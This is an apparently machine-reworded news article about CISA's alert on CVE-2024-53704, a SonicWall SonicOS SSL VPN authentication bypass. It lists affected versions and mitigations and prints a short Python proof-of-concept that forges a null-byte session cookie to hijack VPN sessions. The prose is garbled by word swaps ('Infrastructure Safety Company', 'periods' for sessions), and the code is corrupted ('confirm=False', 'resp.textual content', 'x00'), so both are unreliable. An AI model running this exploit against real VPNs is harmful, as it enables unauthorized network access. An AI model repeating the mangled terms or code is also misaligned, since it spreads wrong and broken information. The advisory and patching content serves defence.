The U.S. Cybersecurity and Infrastructure Safety Company (CISA) has issued an pressing alert relating to the lively exploitation of important distant code execution (RCE) vulnerability in SonicWall’s SonicOS, tracked as CVE-2024-53704.
Added to CISA’s Recognized Exploited Vulnerabilities (KEV) catalog on February 19, 2025, the flaw allows unauthenticated attackers to hijack SSL VPN periods and bypass authentication mechanisms solely.
Federal businesses have till March 11, 2025, to remediate the vulnerability beneath Binding Operational Directive (BOD) 22-01.
Personal-sector organizations, significantly in healthcare, finance, and important infrastructure, are urged to prioritize patching because of the exploit’s low complexity and stealthy assault vector.
Technical Evaluation of the Authentication Bypass
The vulnerability resides in SonicOS’s dealing with of SSL VPN session cookies through the getSslvpnSessionFromCookie perform.
As per a report by Cyber Safety Information, Researchers at BishopFox found that the system improperly processes Base64-encoded cookies containing null bytes, permitting attackers to forge legitimate session identifiers.
By crafting a malicious payload of 32 null characters, encoded as a Base64 string and injected through the swap cookie, adversaries can hijack lively VPN periods with out credentials.
A proof-of-concept Python script demonstrates the exploit’s simplicity:
import base64, requests, urllib3, warnings
warnings.filterwarnings("ignore", class=urllib3.exceptions.InsecureRequestWarning)
payload = base64.b64encode(b"x00" * 32).decode()
resp = requests.get(
"https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
cookies={"swap": payload},
confirm=False
)
print(resp.headers)
print(resp.textual content)This script generates a malformed cookie that triggers the authentication bypass, granting attackers unrestricted entry to VPN tunnels.
The flaw’s CVSSv3 rating of 9.8 displays its important severity, compounded by the dearth of required privileges and ease of exploitation.
Affected Merchandise and Mitigation Methods
CVE-2024-53704 impacts the next SonicOS variations:
- SonicOS 7.1.x (variations previous to 7.1.1-7058)
- SonicOS 7.1.2-7019
- SonicOS 8.0.0-8035
SonicWall has launched firmware updates for Gen5–Gen7 firewalls, urging fast deployment. Organizations unable to patch instantly ought to implement these mitigations:
- Limit SSL VPN entry to trusted IP ranges through firewall guidelines.
- Disable internet-facing administration interfaces to cut back publicity.
- Implement multi-factor authentication (MFA) for all VPN customers, eliminating reliance on single-factor credentials.
With over 500,000 international prospects, together with authorities businesses, SonicWall’s widespread adoption magnifies the vulnerability’s danger profile.
Federal businesses face obligatory remediation beneath CISA’s directive, however private-sector entities stay equally weak.
The exploit’s capability to bypass authentication undetected complicates the incident response, as attackers achieve persistent entry with out triggering conventional safety alerts.
CISA’s warning underscores the escalating sophistication of assaults focusing on community home equipment.
As risk actors pivot from software program to {hardware} vulnerabilities, proactive firmware administration and layered authentication defenses are important to mitigating trendy cyber dangers.
Free Webinar: Higher SOC with Interactive Malware Sandbox for Incident Response, and Menace Looking - Register Right here